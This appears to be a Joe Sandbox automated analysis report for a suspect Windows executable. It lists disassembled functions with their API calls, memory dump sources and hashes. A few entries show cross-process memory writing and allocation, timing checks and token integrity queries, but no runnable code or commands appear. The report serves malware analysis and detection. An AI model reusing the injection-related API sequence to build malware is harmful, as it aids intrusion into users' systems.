                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007DFF41,80070057,?,?), ref: 007E0070
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                    • String ID:
                                    • API String ID: 3897988419-0
                                    • Opcode ID: aac994029c1bca59346712b295beb93249b8f2b05b1e7eb8329a0fa2d1d4a840
                                    • Instruction ID: a271e1769c04bc6074e95bd57b008a62d997c91b6318fd1db12111c8fc705627
                                    • Opcode Fuzzy Hash: aac994029c1bca59346712b295beb93249b8f2b05b1e7eb8329a0fa2d1d4a840
                                    • Instruction Fuzzy Hash: 6501A276641204BFDB109F6ADC48BEA7AEDFF48751F148124F905D2210D7B9DD809BA0
                                    Function 007EE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?), ref: 007EE997
                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 007EE9A5
                                    • Sleep.KERNEL32(00000000), ref: 007EE9AD
                                    • QueryPerformanceCounter.KERNEL32(?), ref: 007EE9B7
                                    • Sleep.KERNEL32 ref: 007EE9F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                    • String ID:
                                    • API String ID: 2833360925-0
                                    • Opcode ID: 36604d7488409927ad76028cf331fb50a37772074ed4226ef5386746cd7ed971
                                    • Instruction ID: 16720f3751bf5d20307deb613a9fa99140773353ef093ca0da622886eb139ea2
                                    • Opcode Fuzzy Hash: 36604d7488409927ad76028cf331fb50a37772074ed4226ef5386746cd7ed971
                                    • Instruction Fuzzy Hash: C4012D31C42629EBCF009FE6DC59AEDBBB8FF0D711F004956E502B2242DB38A555C7A2
                                    Function 007E10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007E1114
                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,007E0B9B,?,?,?), ref: 007E1120
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007E0B9B,?,?,?), ref: 007E112F
                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007E0B9B,?,?,?), ref: 007E1136
                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007E114D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                    • String ID:
                                    • API String ID: 842720411-0
                                    • Opcode ID: 50edceb4fa2c679649cd26a8afa29ce7cc00042bc0e94e9d5a0309da5b3d9cc4
                                    • Instruction ID: 229be363d4c89534255d54cbd9d5add60d48d7910524a7c5d1834e68327c4036
                                    • Opcode Fuzzy Hash: 50edceb4fa2c679649cd26a8afa29ce7cc00042bc0e94e9d5a0309da5b3d9cc4
                                    • Instruction Fuzzy Hash: 32018179141305BFDB114F69DC49EAA3F6EFF89360B104418FA41C3350DB71DC008A60
                                    Function 007E0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007E0FCA
                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007E0FD6
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007E0FE5
                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007E0FEC
                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007E1002
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                    • String ID:
                                    • API String ID: 44706859-0
                                    • Opcode ID: e9933e43a4635f0926c2849fc92468ecf61831e58d1817047000ebdc18e0b959
                                    • Instruction ID: 1dd4dbd48c1602b6e574fad669b2479bc65def72f319cba6780f031e900f502a
                                    • Opcode Fuzzy Hash: e9933e43a4635f0926c2849fc92468ecf61831e58d1817047000ebdc18e0b959
                                    • Instruction Fuzzy Hash: 4FF06D39281351FBDB214FA5EC4EF963BAEFF89762F518814FA45C7291CA74DC408A60
                                    Function 007E1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007E102A
                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007E1036
                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007E1045
                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007E104C
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007E1062
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                    • String ID:
                                    • API String ID: 44706859-0
                                    • Opcode ID: b0f94a90a22193061d533c9c45db5383103023d8c8f297b28f9b6f28164b360b
                                    • Instruction ID: 4fddd2027e33444b9c344cf1330d96769388fb5eaca4f5dd2e6d23f1d5512954
                                    • Opcode Fuzzy Hash: b0f94a90a22193061d533c9c45db5383103023d8c8f297b28f9b6f28164b360b
                                    • Instruction Fuzzy Hash: 67F06D39281351FBDB215FA5EC49F963BAEFF89761F514424FA45C7250CA74D8408A60
                                    Function 007F030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                    Download Yara Rule
                                    APIs
                                    • CloseHandle.KERNEL32(?,?,?,?,007F017D,?,007F32FC,?,00000001,007C2592,?), ref: 007F0324
                                    • CloseHandle.KERNEL32(?,?,?,?,007F017D,?,007F32FC,?,00000001,007C2592,?), ref: 007F0331
                                    • CloseHandle.KERNEL32(?,?,?,?,007F017D,?,007F32FC,?,00000001,007C2592,?), ref: 007F033E
                                    • CloseHandle.KERNEL32(?,?,?,?,007F017D,?,007F32FC,?,00000001,007C2592,?), ref: 007F034B
                                    • CloseHandle.KERNEL32(?,?,?,?,007F017D,?,007F32FC,?,00000001,007C2592,?), ref: 007F0358
                                    • CloseHandle.KERNEL32(?,?,?,?,007F017D,?,007F32FC,?,00000001,007C2592,?), ref: 007F0365
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: 499539308f80a0a38a123145a5bc356f0454ca18f78ac29b892419ac032d28ea
                                    • Instruction ID: 4e949499c78b93224659c07066d21a47202d7c1200fc615fc31a6cce10e49588
                                    • Opcode Fuzzy Hash: 499539308f80a0a38a123145a5bc356f0454ca18f78ac29b892419ac032d28ea
                                    • Instruction Fuzzy Hash: 1501A276800B19DFC7309F66D880822FBF9BF503153158A3FD29652A32C375A954DF80
                                    Function 007BD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 007BD752
                                      • Part of subcall function 007B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000), ref: 007B29DE
                                      • Part of subcall function 007B29C8: GetLastError.KERNEL32(00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000,00000000), ref: 007B29F0
                                    • _free.LIBCMT ref: 007BD764
                                    • _free.LIBCMT ref: 007BD776
                                    • _free.LIBCMT ref: 007BD788
                                    • _free.LIBCMT ref: 007BD79A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 786257c0feddde2caddd62ab2c99692170c9085b6d66d7440b6fc13182aedca3
                                    • Instruction ID: 925097350212c5befe6de3ed7e9be8ee7f45642cfaf8fec8e28d0b6e8a94de8b
                                    • Opcode Fuzzy Hash: 786257c0feddde2caddd62ab2c99692170c9085b6d66d7440b6fc13182aedca3
                                    • Instruction Fuzzy Hash: 1AF01D36546208BB8675EB68F9CAEDA7BDDBB45710BA40C15F048E7512DB38FC808A64
                                    Function 007E5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDlgItem.USER32(?,000003E9), ref: 007E5C58
                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 007E5C6F
                                    • MessageBeep.USER32(00000000), ref: 007E5C87
                                    • KillTimer.USER32(?,0000040A), ref: 007E5CA3
                                    • EndDialog.USER32(?,00000001), ref: 007E5CBD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                    • String ID:
                                    • API String ID: 3741023627-0
                                    • Opcode ID: 245d23b333ca388e209f579e1fb55f66ba4792b4787f000733879e573613b466
                                    • Instruction ID: 6fbfcce958ca66ca14eb48273b4d938cefef0585e0b651e5d5b0c54a2bf7f13c
                                    • Opcode Fuzzy Hash: 245d23b333ca388e209f579e1fb55f66ba4792b4787f000733879e573613b466
                                    • Instruction Fuzzy Hash: 7B01D630540B08ABEB205B11DD5EFE677BCBF18B09F00155DA183A10F1DBF4A984CBA0
                                    Function 007B22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 007B22BE
                                      • Part of subcall function 007B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000), ref: 007B29DE
                                      • Part of subcall function 007B29C8: GetLastError.KERNEL32(00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000,00000000), ref: 007B29F0
                                    • _free.LIBCMT ref: 007B22D0
                                    • _free.LIBCMT ref: 007B22E3
                                    • _free.LIBCMT ref: 007B22F4
                                    • _free.LIBCMT ref: 007B2305
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 6c5806332116443a9ca505849f6d194056ad1dbaf2bf377bfabc65d95730bd1d
                                    • Instruction ID: ad98b0a96d322ceac5f0b5569675e274d468adc7d209b168e53f29f6742b7430
                                    • Opcode Fuzzy Hash: 6c5806332116443a9ca505849f6d194056ad1dbaf2bf377bfabc65d95730bd1d
                                    • Instruction Fuzzy Hash: 4FF05474403310DB8A52EF54BC05AD83B68F719752B010A1AF418E22B6CB3C1412DFE5
                                    Function 007995C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                    Download Yara Rule
                                    APIs
                                    • EndPath.GDI32(?), ref: 007995D4
                                    • StrokeAndFillPath.GDI32(?,?,007D71F7,00000000,?,?,?), ref: 007995F0
                                    • SelectObject.GDI32(?,00000000), ref: 00799603
                                    • DeleteObject.GDI32 ref: 00799616
                                    • StrokePath.GDI32(?), ref: 00799631
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                    • String ID:
                                    • API String ID: 2625713937-0
                                    • Opcode ID: 8a7fc72b44dbaf2d485ab07ae1cd0efc8ee736812b312faea3762a865e0173b9
                                    • Instruction ID: f1fc517904cb1dca07ba8c1c13e1d211f2275fffb57f38441f5926a032b8a7b3
                                    • Opcode Fuzzy Hash: 8a7fc72b44dbaf2d485ab07ae1cd0efc8ee736812b312faea3762a865e0173b9
                                    • Instruction Fuzzy Hash: CCF01430046708EBEF225F69ED1CBE93F69BB05322F848218F569950F0D73889A5DF64
                                    Function 007B0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: __freea$_free
                                    • String ID: a/p$am/pm
                                    • API String ID: 3432400110-3206640213
                                    • Opcode ID: 196ea4e2c4c23f5a3d2112e8ce896bb5ce9c6b65aa1e7f3fa70e2c9da7031250
                                    • Instruction ID: 0ee09cadc423a9b37853a08bb5d23707b6113077f83bd8f1d2a1cc6ba10f49ef
                                    • Opcode Fuzzy Hash: 196ea4e2c4c23f5a3d2112e8ce896bb5ce9c6b65aa1e7f3fa70e2c9da7031250
                                    • Instruction Fuzzy Hash: 8AD1C331A0020ADADB249F68C869BFAB7B5FF06700FE84159E9019B651E77D9D80CB91
                                    Function 007B8A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 007B8B6E
                                    • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 007B8B7A
                                    • __dosmaperr.LIBCMT ref: 007B8B81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                    • String ID: .z
                                    • API String ID: 2434981716-427214572
                                    • Opcode ID: c316adc21126b173c6d4dd8174078221595f1192f7d385803dc3a27e3b0628a8
                                    • Instruction ID: 90ca57456f8a2ec4e89ce110f049663caaa2291a16e2dbc9f3dff4941ce71c2c
                                    • Opcode Fuzzy Hash: c316adc21126b173c6d4dd8174078221595f1192f7d385803dc3a27e3b0628a8
                                    • Instruction Fuzzy Hash: 04417CF0604145AFC7649F74CC84BFE7FADEB85304B288199F45487242DE398C02C751
                                    Function 007E2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007EB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007E21D0,?,?,00000034,00000800,?,00000034), ref: 007EB42D
                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007E2760
                                      • Part of subcall function 007EB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007E21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 007EB3F8
                                      • Part of subcall function 007EB32A: GetWindowThreadProcessId.USER32(?,?), ref: 007EB355
                                      • Part of subcall function 007EB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,007E2194,00000034,?,?,00001004,00000000,00000000), ref: 007EB365
                                      • Part of subcall function 007EB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,007E2194,00000034,?,?,00001004,00000000,00000000), ref: 007EB37B
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007E27CD
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007E281A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                    • String ID: @
                                    • API String ID: 4150878124-2766056989
                                    • Opcode ID: fe69bd669907f7cde92494263625052ee402ea573f9ed591b0a1f53877f6ffab
                                    • Instruction ID: 3d00ca4729555b0674b5134c22c28fc0fb2f15d434a643e8c0dd6b2f35b07d25
                                    • Opcode Fuzzy Hash: fe69bd669907f7cde92494263625052ee402ea573f9ed591b0a1f53877f6ffab
                                    • Instruction Fuzzy Hash: DC414D72901258BFDB10DFA5CD46AEEBBB8EF09300F008099FA55B7181DB746E45CBA1
                                    Function 007B172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\cJX8BV8LYG.exe,00000104), ref: 007B1769
                                    • _free.LIBCMT ref: 007B1834
                                    • _free.LIBCMT ref: 007B183E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Users\user\Desktop\cJX8BV8LYG.exe
                                    • API String ID: 2506810119-2569402015
                                    • Opcode ID: 06c65ce4cc2799535088139702ed12fccff1a7b87a04e048a5ed8c4a5abaef98
                                    • Instruction ID: abbdd5938298c93edf3abfcaafc1eb9cf4d11b61cd08c45b85fe06907b6d0133
                                    • Opcode Fuzzy Hash: 06c65ce4cc2799535088139702ed12fccff1a7b87a04e048a5ed8c4a5abaef98
                                    • Instruction Fuzzy Hash: C2316071A40258EFDB21DF999899EDEBBFCFB85320F944166F804D7211DA789E40CB90
                                    Function 007EC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007EC306
                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 007EC34C
                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00851990,010A7200), ref: 007EC395
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Menu$Delete$InfoItem
                                    • String ID: 0
                                    • API String ID: 135850232-4108050209
                                    • Opcode ID: 7bd3791b4967ccd94b7d05fb977ca93494f0d7f3123d42a5b650bc5db207ff5a
                                    • Instruction ID: be5de2580d30ac1feb002d06094623ee596ea1baba9be08b0fcf1c76041c4eec
                                    • Opcode Fuzzy Hash: 7bd3791b4967ccd94b7d05fb977ca93494f0d7f3123d42a5b650bc5db207ff5a
                                    • Instruction Fuzzy Hash: 4241C035205381DFD721DF26D845F5ABBE8BF89310F04861DF9A5972D1C738A805CB62
                                    Function 00814416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0081CC08,00000000,?,?,?,?), ref: 008144AA
